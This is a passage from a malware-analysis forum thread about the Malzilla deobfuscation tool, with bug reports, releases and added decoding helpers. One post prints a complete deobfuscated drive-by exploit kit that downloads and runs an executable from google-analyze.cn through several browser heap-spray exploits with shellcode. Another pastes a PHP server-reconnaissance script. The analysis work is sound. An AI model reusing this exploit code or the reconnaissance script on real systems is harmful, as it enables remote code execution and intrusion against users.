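      baseDetected = true;
    } catch (e) { /* unusable <base>: keep the page URL */ }
  }

  const hrefLinks = [];
  for (const tag of visible.match(/<(?:a|area|link)\b[^>]*>/gi) || []) {
    const href = attr(tag, 'href');
    if (href === null) continue;
    try {
      hrefLinks.push(new URL(href.trim(), base).href);
    } catch (e) {
      hrefLinks.push(href.trim()); // no base known: the relative path stays
    }
  }

  // Second list: every absolute URL in the raw text, wherever it appears.
  // Relative paths cannot be found this way.
  const regexLinks = [
    ...new Set(html.match(/\b(?:https?|ftp):\/\/[^\s"'<>]+/gi) || []),
  ];

  return {
    baseLabel: baseDetected ? 'URI base (detected)' : 'URI base (not detected)',
    base: base ?? null,
    hrefLinks,
    regexLinks,
  };
}
```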
-
Thanks for the explanation Bobby, I am surprised I hadn't noticed it before.
I can only assume this must have been the first time we've seen this particular exploit where the rules file hasn't been a HREF link, and as such the skiddie has in fact borked the script, which is meant to load that file as an add-on to the script's defacing abilities.
The particular link in this script has in fact been 404 for a couple of years now, which always gives me a laugh, you would have thought they would check its availability before attempting to use the script for a RFI lol.
-
Small glitch I've noticed in latest beta, not really important though...
1) Get the latest 'officially' released zip from sourceforge (0.9.3pre5) and extract it...
2) Extract latest devel/test build of malzilla.exe (overwriting the older one),
run it, then simply press the "Mini Html View" button...
"Cannot create file "C:\path-to-malzilla-dir\Cache\tempview".The system cannot find blah-blah..."
Maybe it should automatically create the "Cache" folder upon startup or something...
-
Indeed, Cache folder is created when you do the first download.
I'll correct this bug.
Thanks ;)
-
ISC is reporting on some new javascript trickery:
http://isc.sans.org/diary.html?storyid=4724
Thanks,
TJS
-
Bug & Suggestions:
I think there's a bug in the latest beta build involving the Hex (%) decoder. The bug doesn't exist in older variants, and I was able to repro the issue on several machines.
Issue: hex encoded strings are not decoded properly.
Example: <script src=http://%7A%73%68%61%63%6B%2E%63%6E> decodes to:
<script src=http:?zshack.c6E>
This is incorrect. %7A%73%68%61%63%6B%2E%63%6E should resolve as zshack.cn.
---
Next, some suggestions for the decoder section-- I've started seeing some malware sites using various IP encoding schemes to obfuscate their payload addresses. They are simple to reverse, but it would be nice to have one built into malzilla. Here are some examples:
hex IP encoding
Octal IP encoding
DWord IP encoding
Hybrid encoding (have fun!)
Here are some examples:
http://207.46.197.32
---------------------
http://0xCF.0x2E.0xC5.0x20
http://0317.056.0305.040
http://00317.0056.00305.0040
http://3475948832
http://7770916128
http://12065883424
http://16360850720
http://0xCF2EC520
I can help you with the calculations if you aren't familiar with this stuff...
Great resource: http://www.searchlores.org/obscure.htm (not malware)
Thanks!!
TJS
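Both halves of the post above, the percent-encoded hostname and the hex, octal, DWord and hybrid IP forms, come down to normalising the host part of a URL before it is logged or matched against a blocklist. The following is an added Python example, not Malzilla's IP converter; the function names are made up here, and the reduction modulo 2^32 for oversized DWord values is an assumption chosen because it is what makes the post's larger numbers equal 207.46.197.32.

```python
import re
from urllib.parse import unquote


def _parse_part(part):
    """One host component, inet_aton style: 0x.. is hex, a leading 0 is octal."""
    if re.fullmatch(r"0[xX][0-9a-fA-F]+", part):
        return int(part, 16)
    if re.fullmatch(r"0[0-7]*", part):
        return int(part, 8)
    if re.fullmatch(r"[1-9][0-9]*", part):
        return int(part, 10)
    return None


def decode_ip_host(host, wrap=True):
    """Return the dotted-quad form of an encoded IPv4 host, or None.

    Accepts 1 to 4 components; the last component fills all remaining
    bytes, which is what makes "hybrid" forms such as a.b.<16-bit> work.
    With wrap=True a single DWord larger than 2**32 is reduced modulo 2**32
    (assumption, see lead-in).
    """
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    values = [_parse_part(p) for p in parts]
    if any(v is None for v in values):
        return None
    *leading, last = values
    if any(v > 0xFF for v in leading):
        return None
    tail_bits = 8 * (4 - len(leading))
    if last >= 1 << tail_bits:
        if not (wrap and len(parts) == 1):
            return None
        last %= 1 << 32
    addr = last
    for i, v in enumerate(leading):
        addr |= v << (24 - 8 * i)
    return ".".join(str((addr >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def normalize_url(url):
    """Percent-decode the host, then undo IP encoding if the host is numeric.

    Any user:password@ prefix is dropped; port, path and query are kept.
    """
    m = re.match(r"([A-Za-z][A-Za-z0-9+.-]*)://([^/?#]*)(.*)", url, re.S)
    if not m:
        return url
    scheme, authority, rest = m.groups()
    hostport = authority.rsplit("@", 1)[-1]
    host, sep, port = hostport.partition(":")
    host = unquote(host)
    ip = decode_ip_host(host)
    return f"{scheme}://{ip or host.lower()}{sep}{port}{rest}"


# The encoded forms listed in the post, plus its percent-encoded host.
POST_EXAMPLES = [
    "http://0xCF.0x2E.0xC5.0x20",
    "http://0317.056.0305.040",
    "http://00317.0056.00305.0040",
    "http://3475948832",
    "http://7770916128",
    "http://12065883424",
    "http://16360850720",
    "http://0xCF2EC520",
    "http://%7A%73%68%61%63%6B%2E%63%6E",
]

if __name__ == "__main__":
    for u in POST_EXAMPLES:
        print(f"{u:40} -> {normalize_url(u)}")
```
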
-
Thanks for reporting the bug. It is indeed a BUG.
If you use Decode hex button - you see the bug.
If you use right-click menu > Run script (internal) > decode hex - it works like it should.
I'll take a look at what I did wrong.
I'll also take a look at that IP encoding. Thanks for mentioning this, I had forgotten about such IP encoding. I saw that kind of obfuscation only once, a couple of years ago, and I forgot about it.
-
My pleasure, friend. :)
-
After a lot of time...
http://malzilla.sourceforge.net/builds/
Please download updated files from this folder (you do not need to download the DLL files if you already have them, these are not updated).
Changelog:
Bugfixes:
- Misc Decoders rewrite
- Cookies tab (in Download tab) fixed. It does not mix cookies from various tabs anymore
- Hex view (in Download tab) fixed. Does not show wrong data (from wrong tab) anymore
- improvements in Mini HTML view
- others that I already forgot
Additions:
- new tool on Tools tab - IP converter (see TJS' post)
- decoder Templates
Decoder Templates are code snippets to be added to a script before decoding. Some of the variables from the snippets will be automatically replaced with values from Malzilla. See the Docs folder, there is a list of variables that will be replaced in templates with values from Malzilla (e.g. malzilla.location.href will be replaced with the content of the URL field on the Download tab).
This should help a bit with deobfuscating scripts that are using non-trivial DOM objects.
More templates to come.
All the templates need to be in Templates folder if you want them to appear on the list of templates.
So, if everything goes fine, this will be Malzilla 1.0
Things that are not implemented (and probably will not be implemented because of complexity):
- downloading from FTP on Clipboard Monitor tab
- multi-language interface (we have started this once, but it takes a lot of time that I do not have)
-
Nice one dude :)
-
Bobby,
Malzilla doesn't seem to detect the iFrame SRC's for the links or iFrames tab for the following;
http://www.sanseng.com/eng/Product.asp
/edit
My bad, forgot to click to send to links parser hehe
-
The 'IP converter' tool is excellent!! I really like the UI. I'll do some deep testing later on and let you know what I find. :)
TJS
-
Reply #178 on: August 12, 2008, 12:53:41 PM »
I'll do some deep testing later on and let you know what I find.
Spec tjs got into some pretty deep shit, eh? ;D
-
hmm, is there an easy way to decode these unicode html entities?
http://opana.cn/ya.html
http://opana.cn/all.html
-
hmm, is there an easy way to decode these unicode html entities?
http://opana.cn/ya.html
http://opana.cn/all.html
Decoded
http://opana.cn/ya.htmlhttp://opana.cn/all.html
This was decoded, using the "Enter decimal ASCII here." box available here (http://www.vortex.prodigynet.co.uk/misc/ascii_conv.html)
-
In Malzilla, you can do that on Misc Decoders tab.
btw. hopefully, I will release Malzilla 1.0 today - it will have the most robust decoders ever (for unicode, hex, dec...)
-
Malzilla 1.0 released:
http://sourceforge.net/project/showfiles.php?group_id=203466
-
Nice one dude :)
-
Thanks Bobby :)
-
Congratulations!! This is great news!
Getting to v1.0 is a huge milestone! It's incredible how widely adopted this tool has become.
Keep up the fantastic work, Bobby!
TJS
-
The following code gives Access Violations in Malzilla.
-
Same here :( (confirmed on XP SP2 and SP3)
-
Which option do you use for eval() (replace, override, leave as is)?
It works fine for me here with "leave as is".
Do you have enough free space on the partition, as this script requires a lot of free space (>100mb)?
Is the "eval_temp" folder present in Malzilla's folder?
-
Here is the script after deobfuscation:
var url='http://google-analyze.cn/getexe.exe?o=2&t=1220309190&i=1365934880&e=';
var success=0;
var exeurl=url+'1';
function CreateO(o,n){
var r=null;
try{r=o.CreateObject(n)}catch(e){}
if(!r){try{r=o.CreateObject(n,"")}catch(e){}}
if(!r){try{r=o.CreateObject(n,"","")}catch(e){}}
if(!r){try{r=o.GetObject("",n)}catch(e){}}
if(!r){try{r=o.GetObject(n,"")}catch(e){}}
if(!r){try{r=o.GetObject(n)}catch(e){}}
return(r);
}
var repl=new Array("-","ip","il","te","je","el","ca","ec","ol","os","LH","SX","ve","DO","re","od","pe","it","cl");
function Go(a){
var fso=a.CreateObject("Scr"+repl[1]+"ting.F"+repl[2]+"eSys"+repl[3]+"mOb"+repl[4]+"ct","")
var sap=CreateO(a,"Sh"+repl[5]+"l.Appli"+repl[6]+"tion");
var nl=null;
fname="KB908845.exe";
fname=eval("fso.Bu"+repl[2]+"dPath(fso.GetSp"+repl[7]+"ialF"+repl[8]+"der(2),fname)");
try{nl=CreateO(a,"Micr"+repl[9]+"oft.XM"+repl[10]+"TTP");nl.open("GET",exeurl,false);}
catch(e){try{nl=CreateO(a,"M"+repl[11]+"ML2.XM"+repl[10]+"TTP");nl.open("GET",exeurl,false);}
catch(e){try{nl=CreateO(a,"M"+repl[11]+"ML2.Ser"+repl[12]+"rXM"+repl[10]+"TTP");nl.open("GET",exeurl,false);}
catch(e){try{nl=new XMLHttpRequest();nl.open("GET",exeurl,false);}
catch(e){return 0;}}}}
nl.send(null);
rb=nl.responseBody;
var x=CreateO(a,"A"+repl[13]+"DB.St"+repl[14]+"am");
x.Type=1;
eval("x.M"+repl[15]+"e=3;x.O"+repl[16]+"n();x.Wr"+repl[17]+"e(rb);x.Sa"+repl[12]+"Tof"+repl[2]+"e(fname,2);sap.Sh"+repl[5]+"lEx"+repl[7]+"ute(fname);");
return 1;
}
function mdac(){
var i=0;
var target=new Array("BD96C556"+repl[0]+"65A3-11D0-983A-00C04FC29E36","AB9BCEDD"+repl[0]+"EC7E-47E1-9322-D4A210617116","0006F033"+repl[0]+"0000-0000-C000-000000000046","0006F03A"+repl[0]+"0000-0000-C000-000000000046","6e32070a"+repl[0]+"766d-4ee6-879c-dc1fa91d2fc3","6414512B"+repl[0]+"B978-451D-A0D8-FCFDF33E833C","7F5B7F63"+repl[0]+"F06F-4331-8A26-339E03C0AE3D","06723E09"+repl[0]+"F4C2-43c8-8358-09FCD1DB0766","639F725F"+repl[0]+"1B2D-4831-A9FD-874847682010","BA018599"+repl[0]+"1DB3-44f9-83B4-461454C84BF8","D0C07D56"+repl[0]+"7C69-43F1-B4A0-25F5A11FAB19","E8CCCDDF"+repl[0]+"CA28-496b-B050-6C07C962476B",null);
while(target[i]){
var a=null;
a=document.createElement("object");
a.setAttribute(repl[18]+"assid",repl[18]+"sid:"+target[i]);
if(a){try{var b=CreateO(a,"Sh"+repl[5]+"l.Appli"+repl[6]+"tion");if(b){if(Go(a))return 1;}}catch(e){}}
i++;
}
}
if(mdac()) success=1;
if(!success){
document.write("<script language=VBScript>\r\n"+
'Set elem=document.createElement("ob'+repl[4]+'ct")'+"\r\n"+
'fname="KB908518.exe"'+"\r\n"+
'elem.setAttribute "id","elem"'+"\r\n"+
'elem.setAttribute "'+repl[18]+'assid","'+repl[18]+'sid:BD96C556'+repl[0]+'65A3-11D0-983A-00C04FC29E36"'+"\r\n"+
'Set obj=elem.CreateObject("Sh'+repl[5]+'l.Appli'+repl[6]+'tion","")'+"\r\n"+
"Set nsp=obj.NameSpace(20)\r\n"+
'Set pnm=nsp.ParseName("Symbol.ttf")'+"\r\n"+
'tmp=Split(pnm.Path,"\\",-1,1)'+"\r\n"+
'path=tmp(0) & "\\" & tmp(1) & "\\"'+"\r\n"+
"fname=path & fname\r\n"+
'set tpqpd=CreateObject("Micr'+repl[9]+'oft.XM'+repl[10]+'TTP")'+"\r\n"+
'iiqu=tpqpd.Open("GET",exeurl,0)'+"\r\n"+
"tpqpd.Send()\r\n"+
"On Error Resume Next\r\n"+
"egsyho=tpqpd.responseBody\r\n"+
'Set acvqqrp=elem.CreateObject("Scr'+repl[1]+'ting.F'+repl[2]+'eSys'+repl[3]+'mOb'+repl[4]+'ct","")'+"\r\n"+
"Set kld=acvqqrp.CreateTextFile(fname, TRUE)\r\n"+
"lotzom=LenB(egsyho)\r\n"+
"For j=1 To lotzom\r\n"+
"plkosl=MidB(egsyho,j,1)\r\n"+
"qamplxd=AscB(plkosl)\r\n"+
"kld.Write(Chr(qamplxd))\r\n"+
"Next\r\n"+
"kld.Close\r\n"+
'Set yipt=elem.CreateObject("WScr'+repl[1]+'t.Sh'+repl[5]+'l","")'+"\r\n"+
"On Error Resume Next\r\n"+
"yipt.R"+repl[19]+" fname,1,FALSE\r\n"+
'<\/script>');
}
if(!success){
exeurl=url+'9';
document.write('<object classid="clsid:59DBDDA6-9A80-42A4-B824-9BC50CC172F5" id="test"></object>');
try{test.DownloadFile(exeurl,"..\\~tmp0001.exe","0","0");document.location="exploits/x9.php?zenturi=1";}catch(e){}
}
var nop='90',noc='0C',scf='F';var shellco='%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320'+
'%u33F5%u49C9%uAD41%uDB33%u0F36%u14BE'+'%u3828%u74F2'+
'%uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF'+'%u5EE7%u5E8B'+
'%u0324%u66DD%u0C8B%u8B4B'+'%u1C5E%uDD03%u048B%u038B'+
'%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u2e00%u5C2e'+
'%u2e7e%u7865%u0065%uC033%u0364%u3040%u0C78%u408B'+
'%u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D34%u7C40'+
'%u408B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFFFF%uEC83'+
'%u8304%u242C%uFF3C%u95D0%uBF50%u1A36%u702F'+'%u6FE8'+
'%uFFF'+scf+'%u8BFF%u2454%u8DFC%uBA52%uDB33'+'%u5353%uEB52'+
'%u5324%uD0FF%uBF5D%uFE98%u0E8A'+'%u53E8%uFFF'+scf+'%u83FF'+
'%u04EC%u2C83%u6224%uD0FF%u7EBF'+'%uE2D8%uE873%uFF40'+
'%uFFFF%uFF52%uE8D0%uFFD7%uFFFF%u7468%u7074%u2F3A%u672F%u6F6F%u6C67%u2D65%u6E61%u6C61%u7A79%u2E65%u6E63%u672F%u7465%u7865%u2E65%u7865%u3F65%u3D6F%u2632%u3D74%u3231%u3032%u3033%u3139%u3039%u6926%u313D%u3633%u3935%u3433%u3838%u2630%u3D65';
if(!success){
var obj=null;
try{
obj=document.createElement("object");
obj.setAttribute("classid","clsid:EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F");
if(obj){
var mystring=unescape(shellco+"%u3731");
var hbs=0x100000,sss=hbs-(mystring.length*2+0x38);
var hb=(0x0c0c0c0c-hbs)/hbs;
var myvar=unescape("%u"+noc+noc+"%u"+noc+noc);
var ss=myvar;
while(ss.length*2<sss)ss+=ss;
ss=ss.substring(0,sss/2);
var m=new Array();
for(i=0;i<hb;i++)m[i]=ss+mystring;
z=Math.ceil(0x0c0c0c0c);
z=document.scripts[0].createControlRange().length;
}
}catch(e){}
}
if(!success){
obj=document.write('<iframe src="exploits/x12b.php?o=2&t=1220309190&i=1365934880" width=0 height=0></iframe>');
}
if(!success){
var repl=new Array("cl","-");
try{
obj=document.createElement("object");
obj.setAttribute(repl[0]+"assid",repl[0]+"sid:2F542A2E"+repl[1]+"EDC9-4BF7-8CB1-87C9919F7F93");
var mystring=unescape(shellco+'%u3331');
var myvar = unescape("%u"+noc+noc+"%u"+noc+noc);
var bblock = myvar;
var sspace = 20 + mystring.length;
while (bblock.length < sspace) bblock += bblock;
var fblock = bblock.substring(0,sspace);
var block = bblock.substring(0,bblock.length - sspace);
while (block.length + sspace < 0x40000) block = block + block + fblock;
var mem = new Array();
for (i=0; i<400; i++) mem[i]=block+mystring;
var buf = '';
while (buf.length < 32) buf = buf + unescape("%"+noc);
var m = '';
m = obj.Console;
obj.Console = buf;
obj.Console = m;
m = obj.Console;
obj.Console = buf;
obj.Console = m;
}catch(e){}
}
if(!success){
var target1=document.createElement("object");
target1.setAttribute("classid","clsid:DCE2F8B1-A520-11D4-8FD0-00D0B7730277");
var target2=document.createElement("object");
target2.setAttribute("classid","clsid:9D39223E-AE8E-11D4-8FD3-00D0B7730277");
var mystring=unescape(shellco+'%u3031');
var myvar=unescape("%u"+nop+nop+"%u"+nop+nop);
var bigblock=myvar;
var slspace=20+mystring.length;
while(bigblock.length<slspace)bigblock+=bigblock;
var fillblock=bigblock.substring(0,slspace);
var block=bigblock.substring(0,bigblock.length-slspace);
while(block.length+slspace<0x40000)block=block+block+fillblock;
var memory=new Array();
for(x=0;x<800;x++)memory[x]=block+mystring;
buffer="\x0a";
add = buffer+buffer+buffer+buffer;
while(buffer.length<5000)buffer+=add;
try{target1.server=buffer;target1.initialize();target1.send()}catch(e){}
try{target2.server=buffer;target2.receive();}catch(e){}
}
if(!success){
var repl=new Array("cl","-");
try{
winzip=document.createElement("object");
winzip.setAttribute(repl[0]+"assid",repl[0]+"sid:A09AE68F"+repl[1]+"B14D-43ED-B713-BA413F034904");
var mystring=unescape(shellco+'%u2038');
var hstoaddr=0x0c0c0c0c;
var hbsize=0x400000;
var spslsize=hbsize-(mystring.length*2+0x38);
var myvar=unescape("%u"+nop+nop+"%u"+nop+nop);
var bigb=myvar;
while(bigb.length*2<spslsize)bigb+=bigb;
bigb=bigb.substring(0,spslsize/2);
hblocks=(hstoaddr-0x400000)/hbsize;
var memory=new Array();
for(var i=0;i<hblocks;i++)memory[i]=bigb+mystring;
var test='';
for(i=1;i<231;i++)test+='A';
test+="\x0c\x0c\x0c\x0c\x0c\x0c\x0c";
try{winzip.CreateNewFolderFromName(test)}catch(e){}
}catch(e){}
}
if(!success){
var repl=new Array("ti","bj");
try{
var test=eval("new Ac"+repl[0]+"veXO"+repl[1]+"ect('QuickTime.QuickTime')");
var mystring=unescape(shellco+'%u2037');
var hstoaddr=0x0c0c0c0c;
var hbsize=0x400000;
var spslsize=hbsize-(mystring.length*2+0x38);
var myvar=unescape("%u"+nop+nop+"%u"+nop+nop);
var bigb=myvar;
while(bigb.length*2<spslsize)bigb+=bigb;
hblocks=(hstoaddr-0x400000)/hbsize;
bigb=bigb.substring(0,spslsize/2);
var memory=new Array();
for(var i=0;i<hblocks;i++)memory[i]=bigb+mystring;
document.write('<object CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B"><param name="src" value="exploits/x7b.php"><param name="autoplay" value="true"><param name="loop" value="false"><param name="controller" value="true"></object>');}
catch(e){}
}
if(!success){
try{
var obj=document.createElement("object");
obj.setAttribute("classid","clsid:10072CEC-8CC1-11D1-986E-00A0C955B42E");
var hstoaddr=0x05050505;
var mystring=unescape(shellco+'%u2033');
var hbsize=0x400000;
var plsize=mystring.length*2;
var spslsize=hbsize-(plsize+0x38);
var myvar=unescape("%u"+nop+nop+"%u"+nop+nop);
var spsl=myvar;
while(spsl.length*2<spslsize)spsl+=spsl;
var spsl=spsl.substring(0,spslsize/2);
hblocks=(hstoaddr-0x400000)/hbsize;
var memory=new Array();
for(i=0;i<hblocks;i++)memory[i]=spsl+mystring;
var ssrt=' method="';
for(i=0;i<10437;i++)ssrt+='ԅ';
document.write('<html xmlns:v="urn:schemas-microsoft-com:vml"><object id="VMLRender" classid="CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E"></object><style>v\\:*{behavior:url(#VMLRender);}</style><v:rect style="width:120pt;height:80pt" fillcolor="red"><v:fill'+ssrt+'"></v:rect></v:fill>');
}catch(e){}
}
if(!success){
var repl=new Array("eb","ie","ol","co","et","li");
try{
var wvfi="W"+repl[0]+"V"+repl[1]+"wF"+repl[2]+"derI"+repl[3]+"n.W"+repl[0]+"V"+repl[1]+"wF"+repl[2]+"derI"+repl[3]+"n.1";
var wvfio=new ActiveXObject(wvfi);
var mystring='%u'+nop+nop+shellco+'%u2032';
while(mystring.length<3072)mystring+="%u"+noc+noc;
mystring=unescape(mystring);
var myvar=unescape("%u"+noc+noc);
var bigb=myvar;
while(bigb.length<=0x100000)bigb+=bigb;
var memory=new Array();
for(var i=0;i<120;i++)memory[i]=bigb.substring(0,0x100000-mystring.length)+mystring;
for(var i=0;i<1024;i++){
var wvfio=new ActiveXObject(wvfi);
eval("try{wvfio.s"+repl[4]+"S"+repl[5]+"ce(0x7ffffffe,0,0,202116108);}catch(e){}");
var wvfio=new ActiveXObject(wvfi);
}
}catch(e){}
}
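The `shellco` string in the script above ends in plain data: once the `%uXXXX` escapes are turned back into bytes, the download URL is readable without executing anything. The following added Python example (not part of the original post, and not Malzilla's decoder) does that for the last line of `shellco` as posted and for the per-exploit suffixes the script appends; the function names are made up here.

```python
import re

# Last line of the shellco string exactly as posted above.
SHELLCO_TAIL = (
    "%uFFFF%uFF52%uE8D0%uFFD7%uFFFF%u7468%u7074%u2F3A%u672F%u6F6F%u6C67"
    "%u2D65%u6E61%u6C61%u7A79%u2E65%u6E63%u672F%u7465%u7865%u2E65%u7865"
    "%u3F65%u3D6F%u2632%u3D74%u3231%u3032%u3033%u3139%u3039%u6926%u313D"
    "%u3633%u3935%u3433%u3838%u2630%u3D65"
)

# Suffixes the individual exploit blocks append: unescape(shellco + '...').
SUFFIXES = ["%u3731", "%u3331", "%u3031", "%u2038", "%u2037", "%u2033", "%u2032"]

U_ESCAPE = re.compile(r"%u([0-9A-Fa-f]{4})")
URL = re.compile(rb"(?:https?|ftp)://[\x21-\x7e]+")


def unescape_to_bytes(escaped):
    """Convert %uXXXX escapes to bytes.

    Each %uXXXX is one UTF-16 code unit, stored little-endian in memory,
    so %u7468 becomes the bytes 0x68 0x74 ("ht"). Anything that is not a
    %u escape is ignored.
    """
    out = bytearray()
    for m in U_ESCAPE.finditer(escaped):
        out += int(m.group(1), 16).to_bytes(2, "little")
    return bytes(out)


def printable_runs(data, min_len=6):
    """ASCII strings of at least min_len characters, like the strings tool."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


def embedded_urls(escaped):
    """URLs that appear in the decoded bytes."""
    return [u.decode("ascii") for u in URL.findall(unescape_to_bytes(escaped))]


def callback_urls():
    """One URL per exploit block: the suffix completes the e= parameter."""
    urls = []
    for suffix in SUFFIXES:
        urls.extend(embedded_urls(SHELLCO_TAIL + suffix))
    return urls


if __name__ == "__main__":
    print(printable_runs(unescape_to_bytes(SHELLCO_TAIL)))
    for url in callback_urls():
        print(url)
```

The decoded URL is the same one the script holds in its `url` variable, and the value after `e=` differs per exploit block, so a request seen in proxy logs shows which block made it.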
-
I've got it set to Override :)
-
Please use "Leave as is" as long as it gives results. Use the other two options just in case the "Leave as is" does not work.
-
bobby what are your pc specs and how long did it need to run for? This takes a while... and if you go to other windows and then back to malzilla's window it gives the access violation.
-
I use 2GHz AMD Athlon XP with 1GB RAM. Pretty old configuration for today's standards.
In your example, it creates some 22.000 temp files in eval_temp folder (every time eval() is called, a file is created, and it contains the arguments of eval() function). After that, Malzilla will eliminate duplicates between temp files, so it will remain less than 10 files after that (usually 3-5 files).
Most of the temp files are just a couple of bytes long (<100 bytes), but every file will occupy one whole cluster (usually 4kb), so you need 80mb free space on partition for the temp files.
To deobfuscate this script, my PC needs some 2-3 minutes (no anti-virus app is running, or some other heavy-duty service). Partition is NTFS, not compressed, file indexing is turned off.
I will try to reproduce the bug you got.
btw. are you running more than one instance of Malzilla at once? Both working on deobfuscation at the same time?
-
Another odd bug with v1.0. Right click-exit from the system tray causes Malzilla to return an empty dialog box and fail to exit.
Malzilla
-------
(X)
[ok]
TJS
-
Actually, I don't know what I did-- but malzilla refuses to exit altogether! :P Anywhere I go to try to exit causes this dialog box. Going to have to terminate it the 'fun' way (process explorer) :)
-
I have reproduced the AccessViolation that JohnC and MysteryFCM got. I'm working on it.
If it is a kind of excuse, it is not my fault. It is a fault of the code behind the SynMemo component that I use in Malzilla.
-
On some sites when you click send script to decoder, it might not highlight and send the script, or it might only send one. As an example, this will send the top script but if you click it again it doesn't send the second script and if you click it again it doesn't send the third. But if you click it again (there are only 3 scripts) it will go back to the beginning and highlight/send the first script like it should.
http://www.google.co.uk/
Also, if you click Run Script on decoders tab when there is no script, it will say script compiled, but the run script and debug button will turn grey like it is busy. So you cannot use it, until you close malzilla and re-open it.
-
I've just fixed the problem with finding scripts and with disabled buttons.
I've also fixed AccessViolations.
Only remaining problem is if the decoding get stuck, I can't do anything like Cancel button.
-
Please download this build from here:
http://malzilla.sourceforge.net/builds/
-
Just downloaded the latest one, which it appears may have an ftp problem. I was unable to retrieve the script from this link, ftp://216.12.192.109/ids.txt
The script at the link was then retrieved using the first malzilla version incorporating ftp.
-
Works fine here. Can you test with WGET or with older version of Malzilla again?
Maybe it is a temporary server glitch or something like that.
-
Prolly just a server glitch ..... script was snagged without issue here :)
<?php
function ConvertBytes($number)
{
$len = strlen($number);
if($len < 4)
{
return sprintf("%d b", $number);
}
if($len >= 4 && $len <=6)
{
return sprintf("%0.2f Kb", $number/1024);
}
if($len >= 7 && $len <=9)
{
return sprintf("%0.2f Mb", $number/1024/1024);
}
return sprintf("%0.2f Gb", $number/1024/1024/1024);
}
echo "Osirys<br>";
$un = @php_uname();
$up = system(uptime);
$id1 = system(id);
$pwd1 = @getcwd();
$sof1 = getenv("SERVER_SOFTWARE");
$php1 = phpversion();
$name1 = $_SERVER['SERVER_NAME'];
$ip1 = gethostbyname($SERVER_ADDR);
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;
echo "Osirys was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "uptime: $up<br>";
echo "id: $id1<br>";
echo "pwd: $pwd1<br>";
echo "php: $php1<br>";
echo "software: $sof1<br>";
echo "server-name: $name1<br>";
echo "server-ip: $ip1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;
-
Just tried grabbing it with the new version, this time it worked fine.
Must have been a server burp.
-
Please can HTTP headers that are returned also be stored in the cache, so if we need to open a cached page, we see what headers were returned.
-
Please can HTTP headers that are returned also be stored in the cache, so if we need to open a cached page, we see what headers were returned.
I'm giving my best to do something about that script that uses HTML elements (where you also need these cookies).
I got one week free from the job (there is no job for me next week in the company), so I hope I'll get these new issues with obfuscation solved (incl. caching the cookies).
-
Implemented extended cache (cookies inclusive).
Partial working solution for the LuckySploit (the one with HTML elements and cookie).
Shellcode analyzer based on libemu is already implemented (you can analyze these WMF, ANI, PDF etc. exploits now).
As soon as I get some more free time, I'll finish LuckySploit deobfuscation and I'll push a release.
Malzilla's site would also need some updating :(
-
Looking forward to it dude :)
-
Keep up the good work :)
-
Any chance for in program updating? :), i always hated having to dl new versions manually :P
-
@Kayrac
Pretty much impossible with SourceForge's organization of mirrors.
@all
1.1.0 is uploaded to the servers. Mirrors will probably need some time to synchronize.
Now I need to sit down and write some documentation and tutorials on new features.
-
Cheers dude :)
-
Clicking detect in the Kalimero tab with nothing in the box causes MalZilla to freeze.
On the Misc Decoders tab, it would be nice to have a little checkbox or radio button to enable/disable the "Override default delimiter" option. So that if it is enabled whatever is in the box will be the delimiter, even if nothing is in the box. This would be useful for when you got hex without the %. Or perhaps an insert character at every increment, like UltraEdit. These are not important features though, so if they are too time consuming or could incorporate bugs, don't worry ;)
-
Thanks.
@JohnC
Interesting, Kalimero freezes in a lot of situations. I didn't test its robustness. I have used it just for getting HTML objects for LuckySploit.
About working without delimiter in Misc decoders - it is possible to do for encodings with fixed length of a number (e.g. hex), but it can't be done as general rule because of e.g. decimal numbers (1,10,100) where the length of one member can be 1 to 3.
You can insert a delimiter by using PScript, and example script for such task is already included with Malzilla (I believe it was added with Malzilla 0.9.3 or even 0.9.2.1).
It is not a problem to do insertion of delimiter, or decoding without delimiter. I'll wait a couple of days to see if there is more bug reports, and I'll push another release.
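The fixed-length versus variable-length point from the post above, as an added example that is not part of the thread and is not Malzilla's or PScript's code. The function names are hypothetical and the sample strings are constructed.

```python
from urllib.parse import unquote


def _chunks(text, width):
    """Cut text into fields of exactly `width` characters."""
    if width <= 0 or len(text) % width:
        raise ValueError("input length is not a multiple of the field width")
    return [text[i:i + width] for i in range(0, len(text), width)]


def insert_delimiter(text, width, delim):
    """Put `delim` in front of every `width`-character field."""
    return "".join(delim + field for field in _chunks(text, width))


def decode_fixed_width(text, width, base):
    """Decode a delimiter-less run whose fields all have the same width
    (2 hex digits, 3 octal digits, ...)."""
    return bytes(int(field, base) for field in _chunks(text, width))


def decode_delimited(text, delim, base):
    """Decode fields of any length once a delimiter marks where each ends."""
    return bytes(int(tok, base) for tok in text.split(delim) if tok)


def bare_hex_via_url_decoder(text):
    """Hex without '%': insert the delimiter, then use a normal URL decoder."""
    return unquote(insert_delimiter(text, 2, "%"))


def decimal_splits(digits, max_code=255):
    """Every way to cut a delimiter-less decimal run into codes 0..max_code.
    More than one result means the input cannot be decoded unambiguously."""
    if not digits:
        return [[]]
    results = []
    for n in range(1, len(str(max_code)) + 1):
        tok = digits[:n]
        if len(tok) < n:
            break                      # ran out of digits
        if n > 1 and tok[0] == "0":
            break                      # no leading zeros inside a code
        if int(tok) > max_code:
            break                      # longer tokens only get larger
        for rest in decimal_splits(digits[n:], max_code):
            results.append([int(tok)] + rest)
    return results


if __name__ == "__main__":
    hex_run = "6576616c"               # constructed sample: "eval" as bare hex
    print(decode_fixed_width(hex_run, 2, 16))
    print(insert_delimiter(hex_run, 2, "%"), "->", bare_hex_via_url_decoder(hex_run))
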